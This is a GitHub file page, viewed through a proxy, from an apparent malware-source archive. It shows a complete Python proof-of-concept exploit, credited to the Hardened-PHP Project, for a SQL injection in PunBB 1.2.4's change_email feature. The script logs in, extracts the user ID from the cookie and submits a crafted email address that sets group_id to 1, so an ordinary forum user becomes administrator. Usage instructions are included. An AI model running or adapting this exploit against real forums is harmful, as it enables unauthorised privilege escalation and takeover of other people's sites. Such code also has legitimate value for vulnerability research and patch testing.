FazBrowse GitHub Viewer
|
Trending
|
URL:
|
Home
Tools:
[Download Repo ZIP]
[View Raw Code]
[Original HTTPS Page]
MalwareSourceCode/Python/HackTool.Python.PunBB.a.b.d at main · reanimat0r/MalwareSourceCode · GitHub
reanimat0r
/
MalwareSourceCode
Public
forked from
vxunderground/MalwareSourceCode
Notifications
You must be signed in to change notification settings
Fork
0
Star
0
Code
Pull requests
0
Actions
Projects
Security and quality
0
Insights
Additional navigation options
Code
Pull requests
Actions
Projects
Security and quality
Insights
Expand file tree
Breadcrumbs
MalwareSourceCode
/
Python
/
HackTool.Python.PunBB.a.b.d
Copy path
More file actions
More file actions
Latest commit
History
History
History
130 lines (109 loc) · 4.12 KB
Breadcrumbs
MalwareSourceCode
/
Python
/
HackTool.Python.PunBB.a.b.d
Copy path
File metadata and controls
130 lines (109 loc) · 4.12 KB
Raw
Copy raw file
Download raw file
Open symbols panel
Edit and raw actions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
#!/usr/bin/python
#######################################################################
# _ _ _ _ ___ _ _ ___
# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \
# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/
# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_|
#
#######################################################################
# Proof of concept code from the Hardened-PHP Project
#######################################################################
#
# -= PunBB 1.2.4 =-
# change_email SQL injection exploit
#
# user-supplied data within the database is still user-supplied data
#
#######################################################################
import
urllib
import
getopt
import
sys
import
string
__argv__
=
sys
.
argv
def
banner
():
print
"PunBB 1.2.4 - change_email SQL injection exploit"
print
"Copyright (C) 2005 Hardened-PHP Project
\n
"
def
usage
():
banner
()
print
"Usage:
\n
"
print
" $ ./punbb_change_email.py [options]
\n
"
print
" -h http_url url of the punBB forum to exploit"
print
" f.e. http://www.forum.net/punBB/"
print
" -u username punBB forum useraccount"
print
" -p password punBB forum userpassword"
print
" -e email email address where the admin leve activation email is sent"
print
" -d domain catch all domain to catch
\"
some-SQL-Query
\"
@domain emails"
print
""
sys
.
exit
(
-
1
)
def
main
():
try
:
opts
,
args
=
getopt
.
getopt
(
sys
.
argv
[
1
:],
"h:u:p:e:d:"
)
except
getopt
.
GetoptError
:
usage
()
if
len
(
__argv__
)
<
10
:
usage
()
username
=
None
password
=
None
email
=
None
domain
=
None
host
=
None
for
o
,
arg
in
opts
:
if
o
==
"-h"
:
host
=
arg
if
o
==
"-u"
:
username
=
arg
if
o
==
"-p"
:
password
=
arg
if
o
==
"-e"
:
email
=
arg
if
o
==
"-d"
:
domain
=
arg
# Printout banner
banner
()
# Check if everything we need is there
if
host
==
None
:
print
"[-] need a host to connect to"
sys
.
exit
(
-
1
)
if
username
==
None
:
print
"[-] username needed to continue"
sys
.
exit
(
-
1
)
if
password
==
None
:
print
"[-] password needed to continue"
sys
.
exit
(
-
1
)
if
email
==
None
:
print
"[-] email address needed to continue"
sys
.
exit
(
-
1
)
if
domain
==
None
:
print
"[-] catch all domain needed to continue"
sys
.
exit
(
-
1
)
# Retrive cookie
params
=
{
'req_username'
:
username
,
'req_password'
:
password
,
'form_sent'
:
1
}
wclient
=
urllib
.
URLopener
()
print
"[+] Connecting to retrieve cookie"
req
=
wclient
.
open
(
host
+
"/login.php?action=in"
,
urllib
.
urlencode
(
params
))
info
=
req
.
info
()
if
'set-cookie'
not
in
info
:
print
"[-] Unable to retrieve cookie... something is wrong"
sys
.
exit
(
-
3
)
cookie
=
info
[
'set-cookie'
]
cookie
=
cookie
[:
string
.
find
(
cookie
,
';'
)]
print
"[+] Cookie found - extracting user_id"
user_id
=
cookie
[
string
.
find
(
cookie
,
"%3A%22"
)
+
6
:
string
.
find
(
cookie
,
"%22%3B"
)]
print
"[+] User-ID: %d"
%
(
int
(
user_id
))
wclient
.
addheader
(
'Cookie'
,
cookie
);
email
=
'"'
+
email
[:
string
.
find
(
email
,
'@'
)]
+
'"@'
+
email
[
string
.
find
(
email
,
'@'
)
+
1
:]
+
',"
\'
,'
append
=
'group_id=
\'
1'
email
=
email
+
( ((
50
-
len
(
append
))
-
len
(
email
))
*
' '
)
+
append
+
'"@'
+
domain
params
=
{
'req_new_email'
:
email
,
'form_sent'
:
1
}
print
"[+] Connecting to request change email"
req
=
wclient
.
open
(
host
+
"profile.php?action=change_email&id="
+
user_id
,
urllib
.
urlencode
(
params
))
print
"[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"
if
__name__
==
"__main__"
:
main
()
Back
|
FazBrowse Home
|
New Git URL